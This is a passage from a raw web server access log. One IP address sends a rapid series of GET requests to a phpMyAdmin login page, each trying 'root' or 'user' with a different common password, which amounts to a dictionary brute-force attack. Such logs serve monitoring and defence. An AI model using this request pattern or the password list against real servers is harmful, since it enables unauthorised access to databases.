"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:38 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=benjamin HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:38 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=chris HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:39 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=nikita HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:39 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=111222 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:39 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=charles HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:39 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=helpme HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:39 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=2112 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:39 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=jessie HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:40 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=fuckoff HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:40 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=mypassword HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:40 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=forever HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:40 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=mktt HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:40 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=bandit HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:41 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=compaq HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:41 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=jordan23 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:41 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root_123 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:41 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=147852369 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:41 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=hooters HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:41 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=2023 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:42 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=jackson HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:42 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=internet HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:42 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=sql HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:42 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=loulou HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:42 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:43 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=fuckme HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:43 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=banana HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:43 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=spanky HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:43 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=batman HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:43 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=voyager HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:43 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=bubba HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:44 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=rosebud HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:44 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=phantom HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:44 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=69696969 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:44 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=mysql HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:44 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=nicole HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:44 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=admin HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:45 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=102030 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:45 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1237895 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:45 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=cowboys HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:45 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=sandra HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:45 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=john HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:46 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass123 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:46 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=letmein HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:46 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=viking HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:46 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=98765 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:46 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1993 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:46 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=thx1138 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:47 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=Password1 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:47 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=stupid HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:47 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=starwars HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:47 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=mickey HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:47 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=9136668099 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:48 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:48 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root12345 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:48 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=315475 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:48 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root@2016 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:49 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=00000 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:49 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=5150 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:49 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=2021 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:49 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=buddy HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:49 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=booboo HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:49 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=kitten HTTP/1.1" 200 4206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:50 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=blowjob HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:50 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=user HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:50 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=ranger HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:50 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=7777 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:51 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1111 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:51 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=asd123 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:51 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=jeremy HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:51 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=vagrant HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:51 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qweASD HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:51 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=aaa111 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:52 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=snoopy HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:52 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=7654321 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:52 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=hammer HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:52 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=voodoo HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:52 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=1234554321 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:53 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=131313 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:53 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=fish HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:53 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=gfhjkm HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:53 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=xxxxxxxx HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:53 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=uploader HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:53 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=007007 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:54 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=edward HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:54 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=cryptoapp HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:54 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=131313 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:54 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=456123 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:54 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=startrek HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:54 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=barney HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:55 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=loveme HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:55 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pokemon HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:55 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=zzzzzz HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:55 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=luzit2000 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:55 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rainbow HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 